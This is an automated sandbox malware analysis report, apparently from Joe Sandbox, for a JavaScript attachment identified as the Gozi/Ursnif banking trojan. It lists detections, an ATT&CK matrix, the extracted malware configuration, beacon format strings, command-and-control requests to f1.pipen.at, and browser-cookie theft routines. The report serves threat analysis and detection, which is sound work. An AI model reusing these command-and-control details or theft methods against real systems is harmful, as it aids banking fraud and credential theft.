Loading ...

Play interactive tourEdit tour

Analysis Report open_attach_p2y.js

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:221263
Start date:08.04.2020
Start time:18:21:22
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 7m 16s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:open_attach_p2y.js
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Run name:Without Instrumentation
Number of analysed new started processes analysed:19
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:1
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.bank.troj.evad.winJS@19/19@4/1
EGA Information:
  • Successful, ratio: 66.7%
HDC Information:
  • Successful, ratio: 4.5% (good quality ratio 4.1%)
  • Quality average: 76.1%
  • Quality standard deviation: 30.1%
HCA Information:
  • Successful, ratio: 75%
  • Number of executed functions: 100
  • Number of non-executed functions: 260
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Start process as user (medium integrity level)
  • Found application associated with file extension: .js
Warnings:
Show All
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, taskhostw.exe, dllhost.exe, ielowutil.exe, WMIADAP.exe, conhost.exe, WmiPrvSE.exe
  • Excluded IPs from analysis (whitelisted): 72.247.224.69, 93.184.221.240, 2.17.173.106, 23.39.80.147, 152.199.19.161
  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ie9comview.vo.msecnd.net, wu.ec.azureedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, site-cdn.onenote.net.edgekey.net, wu.azureedge.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e5684.g.akamaiedge.net, go.microsoft.com, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, go.microsoft.com.edgekey.net, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, cs9.wpc.v0cdn.net
  • Execution Graph export aborted for target mshta.exe, PID 3912 because there are no executed function
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
Gozi Ursnif
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1Windows Management Instrumentation2Valid Accounts1Valid Accounts1Software Packing3Credential DumpingSystem Time Discovery1Remote File Copy3Email Collection1Data Encrypted1Remote File Copy3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaPowerShell1Port MonitorsAccess Token Manipulation1Scripting2Network SniffingAccount Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Cryptographic Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesScripting2Accessibility FeaturesProcess Injection513Obfuscated Files or Information3Input CaptureSecurity Software Discovery211Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationStandard Non-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseExecution through API1System FirmwareDLL Search Order HijackingMasquerading11Credentials in FilesFile and Directory Discovery3Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol3SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationExploitation for Client Execution1Shortcut ModificationFile System Permissions WeaknessValid Accounts1Account ManipulationSystem Information Discovery45Shared WebrootData StagedScheduled TransferConnection Proxy1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User Interface1Modify Existing ServiceNew ServiceVirtualization/Sandbox Evasion2Brute ForceVirtualization/Sandbox Evasion2Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentCommand-Line Interface12Path InterceptionScheduled TaskAccess Token Manipulation1Two-Factor Authentication InterceptionProcess Discovery3Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Spearphishing via ServiceThird-party SoftwareLogon ScriptsProcess InjectionProcess Injection513Bash HistoryApplication Window Discovery1Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Supply Chain CompromiseRundll32DLL Search Order HijackingService Registry Permissions WeaknessDLL Side-Loading1Input PromptSystem Owner/User Discovery1Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer EncryptionRogue Cellular Base StationData Destruction
Trusted RelationshipPowerShellChange Default File AssociationExploitation for Privilege EscalationConnection Proxy1KeychainProcess DiscoveryTaint Shared ContentAudio CaptureCommonly Used PortConnection ProxyData Encrypted for Impact

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Found malware configurationShow sources
Source: regsvr32.exe.4888.5.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250137", "uptime": "242", "system": "ecde5b0ce2df094efe45e0bf22cd4877hh", "size": "200777", "crc": "2", "action": "00000000", "id": "3000", "time": "1586395395", "user": "8a8ed6d154c8a3b79c4b2eb5a02b1ead", "hash": "0x43f98375", "soft": "3"}
Multi AV Scanner detection for domain / URLShow sources
Source: f1.pipen.atVirustotal: Detection: 7%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\TsCrxrp.txtVirustotal: Detection: 52%Perma Link
Source: C:\Users\user\AppData\Local\Temp\TsCrxrp.txtReversingLabs: Detection: 54%
Multi AV Scanner detection for submitted fileShow sources
Source: open_attach_p2y.jsVirustotal: Detection: 28%Perma Link
Source: open_attach_p2y.jsReversingLabs: Detection: 25%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\TsCrxrp.txtJoe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 5.2.regsvr32.exe.400000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen8

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0507CDF2 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,5_2_0507CDF2
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_0508940E RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,5_2_0508940E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_05078181 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,5_2_05078181
Contains functionality to query local drivesShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_05087CDC wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,5_2_05087CDC

Networking:

barindex
Creates a COM Internet Explorer objectShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
Found Tor onion addressShow sources
Source: regsvr32.exe, 00000005.00000003.923006439.00000000056B0000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: regsvr32.exe, 00000005.00000002.968635688.0000000005070000.00000040.00000001.sdmpString found in binary or memory: wADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 00000012.00000003.937070436.000002A0B34C0000.00000004.00000001.sdmpString found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:74.0) Gecko/20100101 Firefox/74.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luSoftware\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /api1/SfejCnwg/ObplLX6lgqMk8x5IYWyrQjz/Y2O4fs9mMk/g5eoex0bDl2DvVF1v/M6uzzMMscZde/GqXc2_2Fkiz/zIy5mXztZodBE_/2BxIFhanp_2B_2FgecwGc/qXbCjchMnq9d_2By/xSFy96cXsi_2Bvr/jZWSdrxEZ_2FqHfmDa/9HxiAkDke/iIPkW0ZGIi5a33pJqTQH/aG7V2XSvT4EaW83Zj4J/tBE_2F6g93SgF3rtATdt5C/BL39vJst0BmSb/_2FBNEbv/okmko2ExQMasUC_0A_0DgT_/2BfvRPq9FB/V8RUUgp9vepqYVcH3/KNlus3r_2FFs/hrai0uc9_2F/EMRkNVI3sBXy7Y/WDCf_2Fx/k HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /api1/zf1YyM2D0qq/dv4HwKjvoGPS84/1qhH0K2Xek6YAh6tR0XIZ/pt0xfW_2FFptMyf2/ZDsbpSWyWxuLMgH/IBjLU1JBy0ys9i47vh/XmWMKbee4/6utCB3SHvGD3dRCl6sYn/J8QKxa9bhRYimjIIdrp/kkTm5Bz0hbdye_2BJwZ_2F/oZ6uMwPcYtz3Q/FoX03Kzm/jsy5Ty7DBaSG6MrU3vzWADc/9UJzFpne21/4zPh7s5qA6tPioCev/hWASaIklH0Tr/fMOezL9gwN_/0A_0DtLNCKqGgL/FdN2o0U0x2Tlot6a_2B0C/R_2FekczxIvK_2FZ/5bj5tYMNOYqD02F/k3itIA5kMRr2/y HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /api1/6_2FDqSOD/Nk1aDFtDzHFZEtdiGRH1/QXQBDQuGv8v8VDMhp2g/pBdt89kIiYQRHDo0EPzHC2/8blZ6Yv3GjwVY/JdLmBNGZ/1F_2FnBXN3pWZ769LwlJ0h6/FYzf5_2FJ_/2B9zcaBBY_2FLlTrJ/6Ik6vh3a07Fs/e66v5UzvBUU/YM_2FNpy_2FO8O/8fHd5dLpW7b5T3w_2FHGz/TB0wHf0r74ASXqdk/6Qv_2F1BCk0UWrC/jL_2BjDr37HaZYTT4C/0t0fW_2FF/Ql3e_2BsjcQKPuyNjli_/0A_0DOnCHUgIBBaHF_2/BHKaMuJ7glp5Ijo6QnQeNb/acEhs1lCg1RH7/R_2BMA_2/BJAOnfc9Rm5Gu/HjD_2F HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: f1.pipen.atConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: f1.pipen.atConnection: Keep-Alive
Found strings which match to known social media urlsShow sources
Source: msapplication.xml1.8.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x8286610c,0x01d60e0d</date><accdate>0x8286610c,0x01d60e0d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.8.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x8286610c,0x01d60e0d</date><accdate>0x8288bb4c,0x01d60e0d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.8.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x82906903,0x01d60e0d</date><accdate>0x82906903,0x01d60e0d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.8.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x82906903,0x01d60e0d</date><accdate>0x8292ca9e,0x01d60e0d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.8.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x82953fe4,0x01d60e0d</date><accdate>0x82953fe4,0x01d60e0d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.8.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x82953fe4,0x01d60e0d</date><accdate>0x8297a683,0x01d60e0d</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: f1.pipen.at
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 08 Apr 2020 16:23:14 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Urls found in memory or binary dataShow sources
Source: regsvr32.exe, control.exe, 00000012.00000003.937070436.000002A0B34C0000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000005.00000003.923006439.00000000056B0000.00000004.00000001.sdmp, control.exe, 00000012.00000003.937070436.000002A0B34C0000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: regsvr32.exe, 00000004.00000002.960076221.0000000001530000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.964562442.0000000003030000.00000002.00000001.sdmp, explorer.exe, 00000013.00000000.954891311.0000000000BB0000.00000002.00000001.sdmpString found in binary or memory: http://f1.pipen.at/api1/6_2FDqSOD/Nk1aDFtDzHFZEtdiGRH1/QXQBDQuGv8v8VDMhp2g/pBdt89kIiYQRHDo0EPzH
Source: explorer.exe, 00000013.00000002.1073032575.0000000009C8E000.00000004.00000001.sdmpString found in binary or memory: http://f1.pipen.at/api1/SfejCnwg/ObplLX6lgqMk8x5IYWyrQjz/Y2O4fs9mMk/g5eoex0bDl2DvVF1v/M6uzzMMscZde/G
Source: explorer.exe, 00000013.00000000.1007588572.0000000009A4F000.00000004.00000001.sdmpString found in binary or memory: http://f1.pipen.at/api1/zf1YyM2D0qq/dv4HwKjvoGPS84/1qhH0K2Xek6YAh6tR0XIZ/pt0xfW_2FFptMyf2/ZDsbpSWyWx
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
Source: regsvr32.exe, 00000005.00000003.923006439.00000000056B0000.00000004.00000001.sdmp, regsvr32.exe, 00000005.00000002.968635688.0000000005070000.00000040.00000001.sdmp, control.exe, 00000012.00000003.937070436.000002A0B34C0000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000013.00000002.1043019207.0000000002630000.00000004.00000001.sdmpString found in binary or memory: http://ns.adob1
Source: msapplication.xml.8.drString found in binary or memory: http://www.amazon.com/
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: msapplication.xml2.8.drString found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: msapplication.xml3.8.drString found in binary or memory: http://www.live.com/
Source: msapplication.xml4.8.drString found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml5.8.drString found in binary or memory: http://www.reddit.com/
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
Source: msapplication.xml6.8.drString found in binary or memory: http://www.twitter.com/
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
Source: msapplication.xml7.8.drString found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml8.8.drString found in binary or memory: http://www.youtube.com/
Source: explorer.exe, 00000013.00000000.1013069103.000000000B276000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000005.00000003.810195397.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.923006439.00000000056B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.968635688.0000000005070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.810012568.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.809504976.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.810318612.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.809358127.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000003.937070436.000002A0B34C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.838670762.000000000533B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.810276676.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.1086943730.000000000037E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.809661520.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.809089457.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4888, type: MEMORY
Source: Yara matchFile source: Process Memory Space: control.exe PID: 1784, type: MEMORY

E-Banking Fraud:

barindex
Detected Gozi e-Banking trojanShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ff5_2_0508FB8F
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ie5_2_0508FB8F
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000005.00000003.810195397.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.923006439.00000000056B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.968635688.0000000005070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.810012568.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.809504976.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.810318612.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.809358127.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000003.937070436.000002A0B34C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.838670762.000000000533B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.810276676.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.1086943730.000000000037E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.809661520.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.809089457.00000000054B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 4888, type: MEMORY
Source: Yara matchFile source: Process Memory Space: control.exe PID: 1784, type: MEMORY

System Summary:

barindex
Writes or reads registry keys via WMIShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMIShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
